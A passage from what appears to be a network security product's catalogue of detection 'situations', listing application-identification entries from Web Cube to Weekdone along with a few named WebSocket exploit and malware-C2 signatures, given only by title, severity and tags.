Last changed: sgpkg-ips-1678-5242
Description: Web Cube is the mobile responsive web platform for brands, empowering customers for their website CMS, eCommerce, mobile, and social media
Back to top

Web-De-Mail

About this situation: Web-De mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: A German web-based email site.
Back to top

Web-Help-Desk

About this situation: Application Web-Help-Desk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Web Help Desk makes both first time and enterprise-level automation simple and reduces complexity for help desk management, service desk management, IT service management, IT asset management, inventory and desktop management, compliance management, and knowledge management.
Back to top

Web-Human-Resource

About this situation: Application Web-Human-Resource detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebHR is an indispensable tool for HR, it is reliable yet affordable application not just for an HR Manager, but for each employee in the organization.
Back to top

Web-Sudoku

About this situation: Web Sudoku usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Web-Suite-Pro

About this situation: Web Suite Pro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Web.com

About this situation: Application Web.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Web.com provides a full range of Internet services to small businesses to help them compete and succeed online. Web.com is owner of several global domain registrars and further meets the needs of small businesses anywhere along their lifecycle with affordable, subscription-based solutions including website design and management, search engine optimization, online marketing campaigns, local sales leads, social media, mobile products, eCommerce solutions, and call center services.
Back to top

WEB.DE

About this situation: Application WEB.DE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WEB.DE offers value-added Internet services for a wide range of needs
Back to top

WebAlertPro

About this situation: Application WebAlertPro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebAlertPro.com is a service that watches websites for you and alerts you to new and updated content.
Back to top

Webalo

About this situation: Webalo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-705-5211
Description: Webalo is a mobile app development platform.
Back to top

Webcamnow

About this situation: webcamnow usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Webcargo

About this situation: Application Webcargo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WEBCARGO offers data management and content management solutions to the advertising industry.
Back to top

WebCash

About this situation: Application WebCash detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebCash is a service yhat allows users to pay for online and offline purchases.
Back to top

WebCDR-Billing

About this situation: Application WebCDR-Billing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebCDR Billing solution for telecom industry with an option of uploading carrier rate sheets in their native formats.
Back to top

WebCEO

About this situation: Application WebCEO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebCEO offers online SEO tools for site owners, SEO agencies and in-house SEO teams.
Back to top

Webcrm

About this situation: webCRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

WebDAM-Solutions

About this situation: Application WebDAM-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebDAM provides digital asset management software to help your company organize digital assets.
Back to top

WebDAV

About this situation: WebDAV traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-1620-5242
Description: WebDAV is a set of extensions to HTTP/1.1 specification. WebDAV defines extra methods, headers, and content-types for the purpose of resource property management, resource collection creation and management, URL namespace manipulation, and resource locking.
Back to top

WebDPW

About this situation: Application WebDPW detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebDPW is a suite of comprehensive tools to Manage, Maintain and Track your Infrastructure.
Back to top

WebEDI

About this situation: Application WebEDI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebEDI is a web-based EDI subscription service that provides suppliers with an solution for processing EDI documents using a web browser and internet connection.
Back to top

Webengage

About this situation: Application Webengage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebEngage is marketing tool to optimize conversion rate, measure voice of the customer and increase user engagement via real time push messaging.
Back to top

Webex

About this situation: Endpoint Context Agent based Webex detection
Context: EI Correlation
Severity: 1
Tags: Web Conferencing, Endpoint
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Description: Cisco Webex endpoint application has been detected.
Back to top

Webex

About this situation: Webex usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1865-5242
Description: WebEx provides online presentations, application and Desktop sharing, web conferencing and video conferencing services.
Back to top

Webex-Teams

About this situation: Webex Teams usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1865-5242
Description: Webex Teams is a team collaboration application. It provides many features like video conferencing services, group messaging, digital two-way whiteboard and many other features for better team collaboration. Webex network application needs to be also allowed in your policy to make Webex Teams work properly. By default, sharing GIF images via Giphy and providing troubleshooting data to Segment aren't allowed. You can allow these functionalities by allowing the corresponding network applications.
Back to top

WebExpenses

About this situation: Application WebExpenses detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Web-based Expense Management Solutions, Expense Management Training
Back to top

WebFaction

About this situation: Application WebFaction detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebFaction provides hosting for developers
Back to top

WebFiling

About this situation: Application WebFiling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Workiva created Wdesk, a cloud-based platform for enterprises to collect, manage, report, and analyze business data in real time. Reduce enterprise risk and improve productivity.
Back to top

WebFilings-SEC-Reporting

About this situation: Application WebFilings-SEC-Reporting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebFilings SEC Reporting is an agile, cloud-based software with extensive live-linking and audit control features for many different form types and companies of all sizes.
Back to top

Webflow

About this situation: Application Webflow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webflow provides a web-based service that allows users to create and update online websites.
Back to top

Webhard

About this situation: Webhard usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-630-5211
Description: Webhard is a Korean online storage service which provides functions such as secure file and folder management, transfer and automatic backup of large files to users.
Back to top

Webhost-for-life

About this situation: Application Webhost-for-life detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebHost4Life- offers website hosting solutions, domain name registrations, VPS hosting and other online services.
Back to top

Webinars-OnAir

About this situation: Application Webinars-OnAir detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webinars OnAir is the all-in-one webinar tool suite for Google's Hangouts On Air, it turns a normal Google
Back to top

WebJaguar

About this situation: Application WebJaguar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The WebJaguar E-Commerce platform is a World Class proven E-Commerce solutions that help you increase sales and automate your processes. Advanced Database driven website and shopping cart solutions. Integrated CRM and e-mail marketing solution.
Back to top

webKPI

About this situation: Application webKPI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: webKPI designs and delivers a suite of Software as a Service based business intelligence solutions to small and medium size businesses. It offers solutions in the areas of business intelligence dashboards, budget analysis, budget development, and benchmarking and valuation.
Back to top

WebLaunching

About this situation: Application WebLaunching detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Web Hosting with no setup fee and Domain Registration.
Back to top

WebLinc

About this situation: Application WebLinc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebLinc is the commerce and operations management platform for retailers.
Back to top

WebLink-Connect

About this situation: Application WebLink-Connect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebLink Connect is a web-based association management software, seamlessly integrates membership management, event management, financial management, communications management, and website management.
Back to top

WebMaster-OneLine

About this situation: Application WebMaster-OneLine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webmaster Tookit offers a suite of webmaster tools and resources.
Back to top

WebMD

About this situation: Application WebMD detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebMD is a provider of health information services to consumers, physicians, healthcare professionals, employers and health plans.
Back to top

WebMerge

About this situation: Application WebMerge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebMerge is an online service that automates your document creation process, create customized PDF and Word documents for contracts, applications and government forms.
Back to top

webMOBI

About this situation: Application webMOBI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: webMOBI app builder is mobile and web application creator that lets you create and publish an app in three easy steps without any technical skills.
Back to top

Weboffice

About this situation: weboffice usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: WebOffice is used to share documents, coordinate calendars, hold web meetings, manage tasks, build web databases, follow discussions, make announcements and run businesses on the web. Source: WebOffice
Back to top

webOSCAR

About this situation: Application webOSCAR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: webOSCAR automates data collection and tracking, and fulfill documentation requirements for employee OHS compliance.
Back to top

Webpop

About this situation: Application Webpop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webpop - cloud-based code editor and content management system.
Back to top

webPOS-Login

About this situation: Application webPOS-Login detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: epay, a division of Euronet Worldwide, Inc., is a global prepaid product provider and distribution network with a retail network of approximately 636,000 points of sale at approximately 291,000 retail locations across a number of markets
Back to top

WebPrint

About this situation: Application WebPrint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Web Print is an industry solution to manage the growing need for printing from BYOD laptops, wireless devices and anonymous users.
Back to top

WebPt

About this situation: Application WebPt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebPT is a provider of web-based electronic medical record
Back to top

Webreep

About this situation: Application Webreep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webreep is a website customer feedback tool that monitors the quality of a website, detects dissatisfaction, and tells the website owner what is causing the dissatisfaction.
Back to top

Webroot

About this situation: Application Webroot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webroot delivers next-generation endpoint security and threat intelligence services to protect businesses and individuals in a connected world.
Back to top

Webroot-BrightCloud

About this situation: Webroot BrightCloud update service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-628-5211
Description: This service is used to update BrightCloud web site categorization and reputation service.
Back to top

Webropol-2.0-Clover

About this situation: Application Webropol-2.0-Clover detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webropol is the developer and analytics solution.
Back to top

Webs

About this situation: Application Webs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webs is a website creation service enabling users to create sites with blogs, photo albums, video galleries and discussion forums.
Back to top

webShaper

About this situation: Application webShaper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: webShaper is a company that provides e-commerce solution.
Back to top

Webshots

About this situation: Webshots usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Website Translation

About this situation: Sites that enable translation of website text.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable translation of website text.
Back to top

WebsiteAlive

About this situation: Application WebsiteAlive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AliveChat live chat solution, gives your website live chat software.
Back to top

WebSitePulse

About this situation: Application WebSitePulse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebSitePulse is a provider of advanced, independent and remote monitoring services that enable clients to increase the efficiency of their mission-critical e-business operations, and to reduce their risk of failed Internet transactions and loss of revenue.
Back to top

WebSocket

About this situation: WebSocket usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1830-5242
Description: WebSocket protocol usage detected. WebSocket is a full-duplex communications protocol. The protocol handshake is done over HTTP.
Back to top

WebSocket_CS-Beyondtrust-Command-Injection-CVE-2024-12356

About this situation: An attempt to exploit a vulnerability in BeyondTrust Remote Support detected
Context: WebSocket Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BeyondTrust Remote Support, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: Beyondtrust-Command-Injection-CVE-2024-12356
Description:
Back to top

WebSocket_CS-Drovorub-Malware-C2-Communication

About this situation: A WebSocket message resembling known Drovorub communication pattern detected
Context: WebSocket Client Stream
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1271-5242
Vulnerability: Drovorub-Malware
Description:
Back to top

WebSocket_CS-Jenkins-Arbitrary-File-Read-CVE-2024-23897

About this situation: An attempt to exploit a vulnerability in Jenkins detected
Context: WebSocket Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1693-5242
Vulnerability: Jenkins-Arbitrary-File-Read-CVE-2024-23897
Description:
Back to top

WebSocket_CS-Jenkins-Remoting-Fetchjar-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: WebSocket Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: Jenkins-Remoting-Fetchjar-Arbitrary-File-Read
Description:
Back to top

WebSocket_CS-NodeBB-Socket.io-Elevation-Of-Privilege

About this situation: An attempt to exploit a vulnerability in NodeBB detected
Context: WebSocket Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NodeBB, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: NodeBB-Socket.io-Elevation-Of-Privilege
Description:
Back to top

WebSocket_CS-NodeBB-Socket.io-Eventname-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in NodeBB detected
Context: WebSocket Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NodeBB, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: NodeBB-Socket.io-Eventname-Denial-Of-Service
Description:
Back to top

WebSocket_CS-Pivotal-Spring-Framework-Spring-Messaging-Module-STOMP-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Pivotal Spring Framework detected
Context: WebSocket Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Pivotal Spring, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Vulnerability: Pivotal-Spring-Framework-Spring-Messaging-Module-STOMP-Remote-Code-Execution
Description:
Back to top

WebSocket_CS-Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: WebSocket Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016
Description:
Back to top

WebSocket_CS-STOMP-Connect-Request

About this situation: A STOMP CONNECT request was detected
Context: WebSocket Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

WebSocket_CS-STOMP-Disconnect-Request

About this situation: A STOMP DISCONNECT request was detected
Context: WebSocket Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

WebSocket_CS-STOMP-Error-Response

About this situation: A STOMP ERROR response was detected
Context: WebSocket Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

WebSocket_CS-Zero-Payload

About this situation: A WebSocket frame with an empty payload was detected
Context: WebSocket Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk Open Source, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1172-5242
Vulnerability: Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service
Description:
Back to top

WebSocket_SS-Drovorub-Malware-C2-Communication

About this situation: A WebSocket message resembling known Drovorub communication pattern detected
Context: WebSocket Server Stream
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1271-5242
Vulnerability: Drovorub-Malware
Description:
Back to top

WebSocket_SS-Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: WebSocket Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016
Description:
Back to top

WebSocket_SS-STOMP-Connected-Response

About this situation: A STOMP CONNECTED response was detected
Context: WebSocket Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

Websolr

About this situation: Application Websolr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Websolr is an open source search engine powered by Apache Solr that allows developers to index and search their content.
Back to top

WebSource-CPQ-(Configure-Price-Quote)

About this situation: Application WebSource-CPQ-(Configure-Price-Quote) detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Requiring only a browser, WebSource CPQ allows you to configure, price, quote, propose and order your offerings across multiple sales and distribution channels.
Back to top

WebSphere-MQ

About this situation: WebSphere MQ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Description: IBM Websphere MQ is a messaging solution for enterprise by IBM's Message Oriented Middleware offering. It allows applications on a distributed system to securely communicate with each other.
Back to top

WebSpy

About this situation: Application WebSpy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebSpy Vantage is a web reporting tool that automates the process of importing log data from over 200 common network devices, transforming it into useful information, and securely delivering meaningful reports to the right person.
Back to top

Webtrekk

About this situation: Application Webtrekk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webtrekk is a Customer Intelligence Platform is committed to empowering both analysts and marketers by integrating user-centric analytics and automated marketing solutions.
Back to top

Webtrends

About this situation: Application Webtrends detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webtrends is a digital marketing company providing measurement, optimization and social enterprise solutions.
Back to top

Webuzo

About this situation: Application Webuzo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webuzo is a Single User Control Panel which helps users deploy Web Apps or System Apps on their virtual machines or in the Cloud.
Back to top

WebX

About this situation: Application WebX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webx Networks is in operation providing rock solid Internet Solutions, such as Billing System, Turn-Key ISP Setup, Enterprise Web Applications, and Web Hosting services to clients worldwide.
Back to top

Webydo

About this situation: Application Webydo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Webydo is professional online website design software for designers. With Webydo designers can create multiple websites with custom tailored design from scratch without writing one line of code.
Back to top

WeChat

About this situation: WeChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1772-5242
Description: WeChat is a mobile text and voice messaging communication application developed by the company Tencent Inc.
Back to top

WeChat-Call

About this situation: WeChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1054-5242
Description: WeChat is a mobile text and voice messaging communication application developed by the company Tencent Inc. This application identifies the voice or video calls performed with WeChat.
Back to top

WeChat-FileTransfer

About this situation: WeChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1054-5242
Description: WeChat is a mobile text and voice messaging communication application developed by the company Tencent Inc. This application identifies the file transfers performed with WeChat.
Back to top

WeCom

About this situation: WeCom usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1854-5242
Description: WeCom is a corporate communications and office collaborations tool created by Tencent WeChat Team. This application can only be used for blocking the application.
Back to top

WeCom URL List

About this situation: URL list of WeCom Servers.
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Description:
Back to top

Wedoist

About this situation: Wedoist usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Wedoist is an online web-based project management software. Wedoist allows users to add projects, invite colleagues to collaborate in the projects, assign tasks, set deadlines, and review progress. The software is fully integrated with email, allows file uploading from Google Drive and Dropbox, and offers real-time collaboration and live chat. Wedoist organizes and archives every project, file, task, deadline, and chat session done on the platform. All data is SSL encrypted.
Back to top

Weebly

About this situation: Weebly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-750-5211
Description: Weebly is a web-hosting service that allows the user to "drag-and-drop" while using their website builder.
Back to top

Weekdone

About this situation: Application Weekdone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
